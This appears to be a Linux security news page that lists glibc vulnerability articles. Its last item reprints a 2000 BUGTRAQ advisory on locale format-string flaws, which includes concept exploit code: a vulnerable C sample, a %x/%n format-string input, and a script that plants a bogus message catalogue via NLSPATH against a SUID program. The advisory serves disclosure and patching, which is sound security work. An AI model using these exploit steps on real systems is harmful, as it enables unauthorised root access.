Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found 0 articles for you...
210
security advisoryFedoraremote code executionDebian: DSA-5611-1 Critical: Glibc Remote Code Execution Risks
Four significant vulnerabilities have been discovered in the GNU C Library (glibc) , a fundamental component of most Linux distributions. These vulnerabilities pose a significant risk to millions of Linux systems, as they can allow attackers to gain full root access and execute remote code on affected systems. . What Are These Vulnerabilities? Am I Impacted? The first vulnerability, tracked as CVE-2023-6246 , is a heap-based buffer overflow flaw in the syslog and vsyslog functions of the GNU C Library. This vulnerability allows unprivileged users to escalate their privileges and gain full root access, enabling attackers to view additional infrastructure to attack, add or delete users, or modify permissions of files or other users. It affects major Linux distributions such as Debian, Ubuntu, and Fedora. This vulnerability alone should raise concern among Linux admins and infosec professionals as it has the potential for widespread system compromise. Two additional vulnerabilities related to the same function have been found in Glibc: CVE-2023-6779 and CVE-2023-6780 . These vulnerabilities involve off-by-one heap-based buffer overflows and integer overflow issues. Although they are described as having a minor impact, further investigation reveals that their exploitation can be even more complex. These vulnerabilities add complexity and increase the risk factor for Linux systems. The final vulnerability discovered is a memory corruption issue in the qsort function of the GNU C Library. This flaw can be exploited when qsort() is used with a nontransitive comparison function and when an attacker controls many elements. According to researchers, "Exploitation of these vulnerabilities may allow attackers to gain remote code execution (RCE) on affected systems, potentially leading to data theft and system compromise." This highlights the importance of addressing these vulnerabilities promptly, as they can have severe consequences for system security. One significant aspect to consider is thewide range of affected versions of the GNU C Library. The vulnerabilities discovered impact all Glibc versions dating back to September 1992. This has implications for older systems that may still be in use, as well as newer systems that have yet to update to the latest release. This raises questions about the long-term consequences of maintaining and securing Linux systems running older versions of the GNU C Library. How Can I Secure My Linux Systems Against These Bugs? Immediate action is required to mitigate these bugs. We advise users to update their Glibc versions to mitigate the risks, while system administrators and developers should review their applications and libraries to ensure the safety of their systems. This calls for a diligent and proactive approach from Linux admins and information security professionals to protect their systems and stay ahead of potential attacks. Debian , Fedora , Gentoo , Mageia , and Ubuntu have released important advisory updates addressing these vulnerabilities. Final Thoughts on These GlibC Flaws & Their Impact In conclusion, the discovery of critical flaws in the GNU C Library has far-reaching implications for Linux systems. The vulnerabilities can lead to privilege escalation, remote code execution, and system compromise. Linux admins, infosec professionals, and sysadmins must be aware of these vulnerabilities and take immediate action to update their systems and mitigate the risks. These issues highlight the ongoing importance of keeping software components up to date and conducting regular security reviews to ensure the safety of Linux systems. Stay safe out there, fellow Linux users! . Recent security flaws identified in the GNU C Library necessitate urgent action from Linux administrators and system operators.. glibc Issues, Remote Code Threats, Linux Service Updates, System Security Alerts. . Dave Wreski
Feb 11, 2024
•
Security Vulnerabilities
210
security advisorybuffer overflowFedoraUbuntu and Fedora: Critical Glibc Bug Leads to Privilege Escalation
A notorious buffer overflow vulnerability dubbed “Looney Tunables” was recently found in the GNU C Library. This severe bug exists in the glibc dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable ( CVE-2023-4911 ). This vulnerability was introduced in April 2021 and poses a significant threat to systems with default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13. . According to the security researchers who discovered this vulnerability, "This environment variable, intended to fine-tune and optimize applications linked with glibc, is an essential tool for developers and system administrators. Its misuse or exploitation broadly affects system performance, reliability, and security." A local user can exploit the Looney Tunables flaw to gain full root privileges on impacted systems, potentially resulting in data breaches and system compromise. Debian , Fedora , Gentoo , Oracle , RedHat, and Ubuntu have released critical glibc security updates to mitigate this severe bug. Given this vulnerability's damaging repercussions on impacted systems, if left unpatched, we urge all impacted users to update immediately to protect against privilege escalation attacks potentially leading to downtime and compromise. To stay on top of essential updates released by the open-source programs and applications you use, register as a LinuxSecurity user , subscribe to our Linux Advisory Watch newsletter, and customize your advisories for your distro(s). This will enable you to stay up-to-date on the latest, most significant issues impacting the security of your systems. Follow @LS_Advisories on Twitter for real-time updates on advisories for your distro(s) . . A significant Linux kernel vulnerability enables unauthorized users to gain elevated privileges, jeopardizing system integrity on several operating systems.. glibc Security Update, Local Privilege Escalation, Linux Critical Bug. . Brittany Day
Oct 19, 2023
•
Security Vulnerabilities
83
security advisorycriticalremote code executionAll Linux Systems glibc Critical Remote Code Execution Advisory
A critical vulnerability has been found in glibc, the GNU C library, that affects all Linux systems dating back to 2000. Attackers can use this flaw to execute code and remotely gain control of Linux machines. . The issue stems from a heap-based buffer overflow found in the __nss_hostname_digits_dots() function in glibc. That particular function is used by the _gethostbyname function calls. The link for this article located at ThreatPost is no longer available. . Alarming glibc vulnerability enables malicious actors to run arbitrary code on Linux machines through remote connections, presenting significant security threats.. glibc Vulnerability, Remote Code Execution, Linux Security. . LinuxSecurity.com Team
Jan 27, 2015
•
Hacks/Cracks
77
security advisorybuffer overflowglibcGlibc Buffer Overflow and ReiserFS Security Advisory Overview and Details
Problems this week include a problem with glibc, a possible problem with ReiserFS, a buffer overflow in exrecover, a stack overflow in arp, temporary file race conditions in a long list of programs, and a back door in Borland InterBase. . . . . Problems this week include a problem with glibc, a possible problem with ReiserFS, a buffer overflow in exrecover, a stack overflow in arp, temporary file race conditions in a long list of programs, and a back door in Borland InterBase. . Numerous vulnerabilities examined covering OpenSSL, heap corruption, ext4 filesystem, and symlink attack scenarios.. glibc Issue, Buffer Exploit, ReiserFS Security. . LinuxSecurity.com Team
Jan 16, 2001
•
Server Security
83
security advisorycritical issueformat stringglibc Advisory CORE-090400 Critical: UNIX Format String Exploit
A serious security vulnerability has been found in glibc, the standard C library which is responsible for many core functions, including printf(). This new form of vulnerability, titled "format string" vulnerability, occurs when an input string is interpreted incorrectly, resulting in the potential for execution of arbitrary code. Most vendors have already released updates.. . .. A serious security vulnerability has been found in glibc, the standard C library which is responsible for many core functions, including printf(). This new form of vulnerability, titled "format string" vulnerability, occurs when an input string is interpreted incorrectly, resulting in the potential for execution of arbitrary code. Most vendors have already released updates. Date: Mon, 4 Sep 2000 12:33:29 -0700 From: Elias Levy Subject: Wide Spread UNIX Vulnerability To: BUGTRAQ-PRESS@ The following message was just send out over BUGTRAQ. In it Ivan Arce of CODE SDI discloses a security vulnerability that affects almost all UNIX systems, including Linux. The vulnerability can normally only be exploited locally, but there are some instances where it may be possible to exploit it remotely via TELNET. The problem is the result of a new class of vulnerabilities that were discussed on BUGTRAQ during the last few months. This type of vulnerabilities are being termed "format string" vulnerabilities. These types of vulnerabilities allow a malicious user to supply a vulnerable program with input that the program will interpret as a format string (for example for the standard C *printf functions) and can result in an attack with similar results as a buffer overflow. In other words execution of arbitrary code on the target. The reason this is exciting is because since the advent in popularity of buffer overflows there really hasn't been any new class of vulnerabilities that we haven't seen already. Now things have changed, and it means people will have to audit their code once again looking for this new type of problem. Its also interestingthat this advisory was released early. CODE SDI wanted to work with all vendors to fix the problem before releasing their advisory. We,, were helping them with this. Sadly it seems one of the vendors that was contacted was not very cooperative and released their advisory before we had a change to work with all vendors. So in essence they screwed up everyone else other than their customers. This exemplifies the problems of working with vendors to fix security vulnerabilities. A follow up post to BUGTRAQ should clear up who is responsible for this breach of confidence. Return-Path: Delivered-To: bugtraq@lists. Received: from (mail. [207.126.127.78]) by lists. (Postfix) with SMTP id 32E6F1EF69 for ; Mon, 4 Sep 2000 10:47:16 -0700 (PDT) Received: (qmail 24079 invoked by alias); 4 Sep 2000 17:48:37 -0000 Delivered-To: BUGTRAQ@ Received: (qmail 24067 invoked from network); 4 Sep 2000 17:48:34 -0000 Received: from sin.core-sdi.com (200.49.71.179) by mail. with SMTP; 4 Sep 2000 17:48:34 -0000 Received: from amadeus.servers.core-sdi.com (amadeus.servers.core-sdi.com [192.168.13.3]) by sin.core-sdi.com (Postfix) with ESMTP id 966221E01 for ; Mon, 4 Sep 2000 15:22:38 -0300 (ART) Received: (from daemon@localhost) by amadeus.servers.core-sdi.com id VAA11538 for BUGTRAQ@; Mon, 4 Sep 2000 21:07:14 -0300 From: =?iso-8859-1?Q?Iv=E1n?= Arce Subject: UNIX locale format string vulnerability Date: 4 Sep 2000 21:07:14 -0300 Organization: CORE SDI S.A. Lines: 302 Message-ID: X-Mailer: Mozilla 4.72 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: BUGTRAQ@ Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit CORE SDI UNIX locale format string vulnerability Date Published: September 4th, 2000 (early release) Advisory ID: CORE-090400 Bugtraq ID: 1634 CVE CAN: None currently assigned. Title: UNIX locale format string vulnerability Class: Input Validation Error Remotely Exploitable: Yes (on some systems) Locally Exploitable: Yes Vulnerability Description: This report is being released earlier (itwas originally scheduled for Sept 11th., 2000) due to the fact that information regarding the vulnerability has been made public by several vendors. Many UNIX operating systems provide internationalization support according to the X/Open XPG3, XPG4 and Sun/Uniforum specifications using the of the locale subsystem. The locale subsystem comprises a set of databases that store language and country specific information and a set of library functions used to store, retrieve and generally manage that information. In particular a database with messages used by almost all the operating system programs is keep for each supported language. The programs access this database using the gettext(3), dgettext(3), dcgettext(3) C functions (Sun/Uniforum specifications) or catopen(3), catgets(3) and catclose(3) ( X/Open XPG3 and XPG4 specification). Generally a program that needs to display a message to the user will obtain the proper language specific string from the database using the original message as the search key and printing the results using the printf(3) family of functions. By building and installing a custom messages database an attacker can control the output of the message retrieval functions that get feed to the printf(3) functions. Bad coding practices and the ability to feed format strings to the later functions makes it possible for an attacker to execute arbitrary code as a privileged user (root) using almost any SUID program on the vulnerable systems. Alternatively, on some operating systems, the problem can be exploited remotely using the environment variable passing options in telnetd. However, a remote attacker must be able to place the suitable messages database on the target host (i.e. anonymous ftp, NFS, email, etc.) Vulnerable Packages/Systems: Sun Microsystems Inc. Solaris 2.x, Solaris 7, Solaris 8 (x86 and Sparc architectures) Silicon Graphics Inc. IRIX 6.2 to 6.5.8 Linux Red Hat Linux Debian Linux Conectiva Linux 4.0 or higher All supported versions of Conectiva Linux use Glibc 2.1.1 which explicitychecks and ignores the NLSPATH environment variable if the catopen() and catgets() functions are called from a SUID executable. Verified and reported by Andreas Hasenak Although the above text is the result of research and email communications that took place during the last 2 weeks, the release of security advisories from Red Hat, Debian and Conectiva Linux acknowledging the existence of the problem seems to probe otherwise. Suspected vulnerable [not checked] AIX HP-UX Tru64 (Digital Unix) SCO OpenServer SCO Unixware Systems not vulnerable OpenBSD As reported by Theo deRaadt FreeBSD As reported by Kris Kennaway FreeBSD does not allow the use of the NLSPATH environment variable in privileged (SUID) applications. FreeBSD can not be exploited remotely either, since the /usr/bin/login program does not use the cat* functions and is SUID root. Solution/Vendor Information/Workaround: Red Hat Linux Refer to the REdHAt Linux announce: Debian Linux Obtain patches from http//www.debian.org/security Refer to the Debian announce: Conectiva Linux Refer to the Conectiva Linux announce Other vendors Contact vendor for a fix Vendor notified on: All vendors were notified on August 22nd, 2000 Credits: This vulnerability was discovered by Ivan Arce of CORE SDI S.A., Buenos Aires, Argentina. This advisory was drafted with the help of the Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp@. Technical Description - Exploit/Concept Code: Passing unchecked user supplied data as a format string to the printf(3) functions can lead to unexpected changes of flow control and execution of arbitrary code in context of the vulnerable program. The following C program exemplifies the problem described: -----sample.c----- void main(int argc, char **argv) { /* This is proper use */ printf("%s\n",argv[1]); /* This is bad use */ printf(argv[1]); printf("\n"); } ------------------ In the above example if argv[1] is a string with characters interpreted by printf(3) as formatting characters, thebehavior of the program can be altered to execute arbitrary code in a way _similar_ to the exploitation of buffer overflow vulnerabilities: $ cc -o sample sample.c $./sample hello hello hello $./sample %x%x%x%x%x%n%n%n%n%n%n%n%n%n %x%x%x%x%x%n%n%n%n%n%n%n%n%n Memory fault (core dumped) $ Recent posts to computer security lists and related publications provide good reference material to understand the problem and possible ways to exploit it. It has been found that most programs in many popular operating systems suffer from this problem derived from the way the messages database of the locale subsystem is used. In particular, privileged programs (programs with the SUID bit set) that execirse access to the database using the gettext(3) function in a vulnerable manner are directly exploitable and allow an attacker to obtain root privileges instantly. The following code exemplifies a common bad coding practice that makes the cited programs vulnerable: main(int argc, char **argv) { if(argc > 1) { printf(gettext("usage: %s filename\n"),argv[0]); exit(0); } printf("normal execution proceeds...\n"); } Here the output of the gettext(3) function is not validated and passed directly to printf(3). gettext(3) searches the messages database for a message that matches the key "usage: %s filename\n" in the current locale settings and returns it to the caller. A malicious, unprivileged, user can build and install a bogus messages database and instruct the vulnerable program to use it, thus controlling the output of gettext() and force-feeding formatting characters to printf(3). The problem above is NOT related to the user input to the program but instead to the data contained in the messages database. The following commands demonstrates the problem: $ uname -a SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5 $ ls -l $ ls -l /usr/bin/eject -r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject $ eject -x`perl -e 'print "ABCDEF". "A"x507` eject: illegal option -- x usage: eject [-fndq] [name | nickname] options: -fforce eject -n show nicknames -d show default device -q query for media present -p do not call eject_popup $ cat > doit.sh #!/bin/ksh export NLSPATH=:`pwd` echo domain \"messages\" > messages.po echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" > > messages.po echo msgstr \"`perl -e 'print "%x"x112. "%n"'`\" > > messages.po msgfmt messages.po cp messages.mo SUNW_OST_OSCMD cp messages.mo SUNW_OST_OSLIB exec eject -x`perl -e 'print "ABCDEF". "A"x507'` ^D $./doit.sh eject: illegal option -- x effffba47efefeff1ff00ef735a38effffba4000447ef7fca782effffac4129642326c00effffa60 115083effffac44effffad05effffb2c002effffac4effffad023000000000000000000000002eff ffba4effffbaa0effffdaeeffffdbfeffffdd5effffdf1effffdf8effffe10effffe2eeffffe9aef fffebeeffffed0effffedeeffffef2efffff0befffff20efffff33efffff42efffff5aefffff72ef ffff7defffff94efffff9defffffaf07d8efffffd67deefffffea3100344205591142c7ef7d00008 0610007d007d13ee7d217d317d9300656a656374002d78Segmentation Fault $ exit As shown, the SUID program 'eject' follows the user directives to use a custom (bogus) messages database. The specific way to do it vary in different operating systems but usually involves the usage of environment variables (NLSPATH, LC_MESSAGES, LANG, etc.) and/or locale library functions (textdomain(3), bindtextdomain(3), etc.) The problem however stems from bad coding practices in the operating system's programs: - A SUID program should not follow the users directives of what database it should use, locale databases should be taken from a secure trusted directory. - Output of gettext(3) should not be passed as a format string directly to printf(3) functions. References A good reference for localization and internationalization is the "Programming for internationalization FAQ": \ /programming-faq.html Sections 3 and 5 describe the locale subsystem and the X/Open and Sun/Uniforum set of functions for language independent messages. Format string bugs and exploitation are described in: Recent vulnerabilities involving format strings $Id:locale-advisory.txt,v 1.8 2000/09/04 17:14:51 iarce Exp $ -- "Understanding. A cerebral secretion that enables one having it to know a house from a horse by the roof on the house, It's nature and laws have been exhaustively expounded by Locke, who rode a house, and Kant, who lived in a horse." - Ambrose Bierce ==================[ CORE Seguridad de la Informacion S.A. ]========= Iván Arce Presidente PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A email:
Sep 05, 2000
•
Hacks/Cracks
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Explore top 10 tips to secure your open-source projects now. Read More